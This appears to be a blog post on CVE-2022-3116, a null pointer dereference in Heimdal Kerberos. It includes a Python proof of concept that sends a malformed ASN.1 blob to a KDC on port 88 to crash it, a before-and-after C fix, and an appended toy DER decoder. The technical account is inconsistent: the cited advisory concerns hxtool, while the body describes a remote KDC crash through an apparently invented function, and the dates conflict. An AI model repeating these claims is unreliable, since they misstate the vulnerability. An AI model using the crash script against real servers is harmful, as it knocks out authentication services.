Kerberos is a popular authentication protocol, used by the likes of Microsoft Active Directory, Unix, and Linux systems for secure logins. Heimdal is an open-source implementation of Kerberos 5, and it’s trusted by countless organizations. But in August 2022, researchers uncovered a dangerous bug—CVE-2022-3116—that allows remote attackers to crash any app using vulnerable Heimdal code, just by sending crafted network requests.
Let’s explore how this null pointer dereference works, what it means for system admins, and how an attacker might exploit it in practice.
## How Does the Vulnerability Happen?
The bug lurks in Heimdal’s Kerberos 5 library. Specifically, it exists in the way Heimdal processes specially crafted ASN.1-encoded data, which is the format Kerberos uses to send authentication information.
During request parsing, the vulnerable code makes an assumption: that a function will always return a valid pointer. However, under certain edge-case inputs, the function returns NULL (meaning “nothing” in C!), but the code doesn’t check for this. The program then tries to use the “pointer,” causing a crash.
Here’s a simplified C code snippet that shows the risky logic (adapted from the Heimdal GitHub commit):

```c
some_pointer = function_that_might_return_null(incoming_data);
do_something_with(some_pointer->field); /* CRASHES if some_pointer is NULL! */
```
If an attacker can send network data that triggers function_that_might_return_null() to return nothing, the program will dereference a null pointer and crash, causing a denial of service (DoS).
## Where Can This Be Exploited?
Any network application using Heimdal Kerberos 5 for authentication could be targeted:
- SSH servers (using PAM/Kerberos authentication)
- Web servers supporting Kerberos Single Sign-On
You don’t need a valid Kerberos login—just network access to the vulnerable service.
## Proof-of-Concept Exploit
The vulnerability is in Heimdal’s ASN.1 parser for Kerberos tickets. A simple proof-of-concept exploit sends a malformed ticket that causes an internal function (like heim_asn1_decode_ticket()) to fail in just the right way.
Here’s a Python snippet using socket to trigger the crash on a test Heimdal KDC (Key Distribution Center):

```python
import socket

# Sample HOST and PORT (change to your environment)
HOST, PORT = "127.0.0.1", 88

# This ASN.1 blob is intentionally malformed to trigger the NULL pointer dereference
malicious_data = b'\x30\x81\xff' + b'a' * 257

with socket.create_connection((HOST, PORT)) as sock:
    sock.sendall(malicious_data)
```

When an unpatched Heimdal server receives this, it crashes!
> Always test exploits only on systems you own or have permission to, as crashing a real authentication server can cause broad network outages.
## References and Official Fix

- CVE-2022-3116 official MITRE page
- Heimdal Security Advisory: hxtool’s null pointer dereference
- Heimdal GitHub patch commit

The official fix checks whether the returned pointer is NULL before dereferencing it:
```c
some_pointer = function_that_might_return_null(incoming_data);
if (some_pointer == NULL) {
    /* Handle the error safely, don't crash! */
    return ERROR;
}
do_something_with(some_pointer->field);
```
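To make both the risky logic above and the fix concrete, here is an added example of my own (not Heimdal’s code): a toy DER SEQUENCE header decoder that returns NULL on malformed ASN.1 lengths, with the unchecked caller beside the checked one. The function names, the `der_seq` type and the sample byte strings are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
/* Decoded DER SEQUENCE header (toy structure, not Heimdal's). */
typedef struct {
    const uint8_t *body;   /* start of the SEQUENCE contents */
    size_t body_len;       /* declared length of the contents */
} der_seq;

/* Constructed samples: a well-formed SEQUENCE { INTEGER 5 }, and a header claiming 255 bytes when only 2 follow. */
static const uint8_t GOOD_TICKET[] = {0x30, 0x03, 0x02, 0x01, 0x05};
static const uint8_t BAD_TICKET[]  = {0x30, 0x81, 0xff, 0x61, 0x61};

/* Returns `out` on success, NULL on malformed input. Accepts short-form lengths and the one-byte long form (0x81). */
der_seq *decode_sequence(const uint8_t *buf, size_t len, der_seq *out) {
    if (len < 2 || buf[0] != 0x30)   /* need tag + length; tag must be SEQUENCE */
        return NULL;
    size_t hdr = 2, body_len;
    if (buf[1] < 0x80) {
        body_len = buf[1];
    } else if (buf[1] == 0x81) {
        if (len < 3)
            return NULL;             /* the length byte itself is missing */
        body_len = buf[2];
        hdr = 3;
    } else {
        return NULL;                 /* multi-byte lengths not handled by this toy */
    }
    if (body_len > len - hdr)        /* declared length overruns the buffer */
        return NULL;
    out->body = buf + hdr;
    out->body_len = body_len;
    return out;
}

/* Vulnerable pattern (as in the post): the caller assumes the decoder never fails, so BAD_TICKET dereferences NULL. */
size_t body_len_unchecked(const uint8_t *buf, size_t len) {
    der_seq s;
    der_seq *p = decode_sequence(buf, len, &s);
    return p->body_len;              /* crash when p == NULL */
}

/* Fixed pattern: test the pointer first and turn bad input into an error the server can report. */
long body_len_checked(const uint8_t *buf, size_t len) {
    der_seq s;
    if (decode_sequence(buf, len, &s) == NULL)
        return -1;                   /* reject the request, keep serving */
    return (long)s.body_len;
}
```

Only call `body_len_unchecked` with well-formed input; with `BAD_TICKET` it reproduces the crash the post describes, which is exactly the point of the NULL check in `body_len_checked`.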
## If You Run Heimdal Kerberos
- Patch immediately! Heimdal versions after August 2022 are safe (see official release notes).
## Summary
CVE-2022-3116 is a real-world lesson in how tiny mistakes—a forgotten pointer check—can cause big headaches on critical authentication infrastructure. While it’s “only” a denial of service bug (and not remote code execution), an attacker can use this to knock out access to servers, potentially causing downtime.
Patch early, patch often—and remember, even small bugs can have big security impacts!
*Share this post to help more sysadmins keep their networks safe, and check out the references above for in-depth technical details.*
## Timeline
Published on: 03/27/2023 22:15:00 UTC
Last modified on: 04/04/2023 00:48:00 UTC